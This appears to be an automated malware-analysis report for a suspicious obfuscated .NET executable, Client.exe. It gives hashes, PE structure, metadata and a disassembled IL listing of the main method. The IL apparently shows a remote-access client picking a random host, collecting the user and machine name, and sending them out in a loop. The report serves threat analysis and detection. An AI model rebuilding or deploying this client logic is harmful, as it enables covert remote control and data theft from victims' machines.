Suspicious
Suspect

16b6304ba96f4502a8d7b38e3eff22f5

PE Executable
|
MD5: 16b6304ba96f4502a8d7b38e3eff22f5
|
Size: 525.44 KB
|
application/x-dosexec


Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
16b6304ba96f4502a8d7b38e3eff22f5
Sha1
1c2550c54cf95c7405d067e72477146a91d261e0
Sha256
0a88bfabdd19480ab62124b59c24488483c70a66c7b90ece49c8cb4b16576be7
Sha384
0b7b3d28c54116c7ca37b07acddc5c0e3ff11e36b52b760a68593bbc0181963e8a73d620b71a79939c14362e6ab829d2
Sha512
709239372ba9bf0f0ea2fe0b42e84f1f092f6393c98e7588053906142fb772cefcb92c63fd358a4e4496c4ec0f9231ed29c45d072cba85fc6d94f56020152d5e
SSDeep
12288:MsGcwouYqQ0d28SARBD7vpK8+2P34uXIEYg:fD7md28SK7vo8X8g
TLSH
0CB429257BD48D41D6951A7EC6BE2A01C726A4F222137383370BF7624D41ADEED2C3DA

PeID

Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
File Structure
[Authenticode]_51d35a4b.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
0el9c03xi
4axuhnjxteq
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Info

Authenticode present at 0x7E800 size 7296 bytes

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::yXULoIJQCKzEBQxbkMo(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

642

Main Method

System.Void vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::yXULoIJQCKzEBQxbkMo(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::sJBdcZYAGwzLZRAhtmPjgHM() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::TqMJCAKQXPlYeoA() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::sGQwJPxsxotJGCMkxjKmMP() stloc V_3 nop <null> ldloc V_3 call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::FljnKfcDFmcqarQIDsTLNGAJV() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::uuCJYlDaPjnxbHyekyMrYKk() br IL_000E: nop call System.Void vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::uuCJYlDaPjnxbHyekyMrYKk() call System.Void HSTTnkenggtNZumjiDHrBWoDl.JeZsIydlOgbQrhIRVkbXDO::UIpjKCkTHZdTjteJQBEaHd() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::YRHUcSJQxeesXPaKLNVmlODC call System.String jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::kYNVYJvRYmdJWEBvGAXfl() call System.String vzccWWVOLUssumStHgOVfYJN.sTIvMIenNRqMKFBHwCyTH::YmXKWVIVPADxC(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::PNdFwpxLGAPKIILKSTQ call System.Void xhEtakdXoKLuU.BCcsyzrbEoGAhr::lRWUVdPnaCmmyfHorJS() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::PNdFwpxLGAPKIILKSTQ call System.Boolean bdfXmTNggMnIwIPj.ZeSHhWJopOsfiEBIRNePk::dFcRHdjGWoTTMhILcmEqJ(System.String) brfalse IL_0268: leave IL_0273 call System.Void bdfXmTNggMnIwIPj.RdIrbXHYbFT::OMGXatsNGWywuMETePPSs() call System.Void EPjMWBUMwbnaxoymOnnNWbWnQ.BowmThXgHAKtjMiwYF::HOyoMBgPxkgPKPUZWGg() ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC ldfld System.Boolean HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::NStisAnhmARsfuafc brtrue IL_0259: call System.Int32 
jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::aOWcrFcnTlGsryESNluq() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::XdPSniDsNlnCyjzmltexbKz call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::BbvdOacIKK() newarr System.Char dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::bnMVloXeLmthaGttDk() call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::lZSHeAIbXCORhFhbFGqcSdfJQ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random EPjMWBUMwbnaxoymOnnNWbWnQ.BowmThXgHAKtjMiwYF::DNVvMjNnJKMosbLpHFY ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::uUXUhZYKZBJf() newarr System.Char dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::VcNzcxVMbteomNIhHuIr() call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::FoEDUptWggSZYVzE() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::DMvvTbsfvLQdRHAnLPo() ldelem.ref <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::wHIcquMMONsI() newarr System.Char dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::dqwwalMLXZdcsOZRmM() call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::KvhwESFZOfQ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC callvirt System.Void HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::PKAxlAzpnekUUfHOQefciWGI() ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC ldloc V_1 call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::SHBnQEqldcxYhezxfnuc() 
ldelem.ref <null> ldloc V_2 ldsfld System.Random EPjMWBUMwbnaxoymOnnNWbWnQ.BowmThXgHAKtjMiwYF::DNVvMjNnJKMosbLpHFY ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::jdMOqMghyrsGhlhrGiFu(System.String,System.String) ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC ldfld System.Boolean HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::NStisAnhmARsfuafc brfalse IL_0259: call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::aOWcrFcnTlGsryESNluq() ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC newobj System.Void EPjMWBUMwbnaxoymOnnNWbWnQ.HIQcsufffNWIEgdnXwZngdb::.ctor(HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ) stfld EPjMWBUMwbnaxoymOnnNWbWnQ.HIQcsufffNWIEgdnXwZngdb HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::RcqiYgBapYTOMgs ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC newobj System.Void xhEtakdXoKLuU.fmPOsMjHUZHAF::.ctor(HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ) stfld xhEtakdXoKLuU.fmPOsMjHUZHAF HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::WFWCKNssrxezHknji ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::nygwusdVMy() newarr System.Object dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::GsKVrbINvbbiyIOZTIt() call System.String jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::cwWhzJiAogdurZpvWEzbEvrYM() call System.String 
vzccWWVOLUssumStHgOVfYJN.sTIvMIenNRqMKFBHwCyTH::YmXKWVIVPADxC(System.String) stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::logfIUrWLMPRdQSpTe() call System.Byte[] EPjMWBUMwbnaxoymOnnNWbWnQ.BowmThXgHAKtjMiwYF::tukxrNKKxMzmbth() stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::EeghZLQhngS() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::VxlsmMVctqXp stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::NTXuSLfMWjmBi() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::dQgPmzZabovifhCjsraDbgl stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::KEhqZFpBowEHG() call System.String System.Environment::get_UserName() call System.String jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::AAWBDaAmwQzqKmiXxwgcNcFLe() call System.String vzccWWVOLUssumStHgOVfYJN.sTIvMIenNRqMKFBHwCyTH::YmXKWVIVPADxC(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::smEptCCxGWAdoRjV() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::BeFdPmhpqO stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::eyNBMzxHNULebpLFLUjfwIg() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::fNOBUlpIbujU stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::MxLqvQYSTDaJ() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::tHRUYOEXbIcpbvQPcOtmH stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::SfnGifhrTfgoYdxzpvVREpO() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::ZofOsQsdBKfHMIvQxRcXCd stelem.ref <null> dup <null> call System.Int32 
jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::GLwwtKXPCMtowYNdzRsSfB() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::icpKWnexGRKT stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::naSeHErocRzAXjkxJ() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::SciZJDfgDoVvHhdF stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::QmLjIDQhsSmw() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::QwijZGHkwyByMBGeckD stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::IFnIVbgPLKYQXxYqtOUjKOOL() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::QZQivijfbZPxeCy stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::SONaLZBgUqu() call System.String EPjMWBUMwbnaxoymOnnNWbWnQ.BowmThXgHAKtjMiwYF::BgyKfTWsfCEeO() stelem.ref <null> call System.Byte[] jxexCWXzamZVJBIXH.nPAiDYMTmUfo::eYZiNeDhrpWAvfLfErN(System.Object[]) callvirt System.Void HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::VKQalwMymrVKsNyRpqRNivdt(System.Byte[]) call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::aOWcrFcnTlGsryESNluq() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_0085: ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC leave IL_0273: ret pop <null> leave IL_0273: ret ret <null>

16b6304ba96f4502a8d7b38e3eff22f5 (525.44 KB)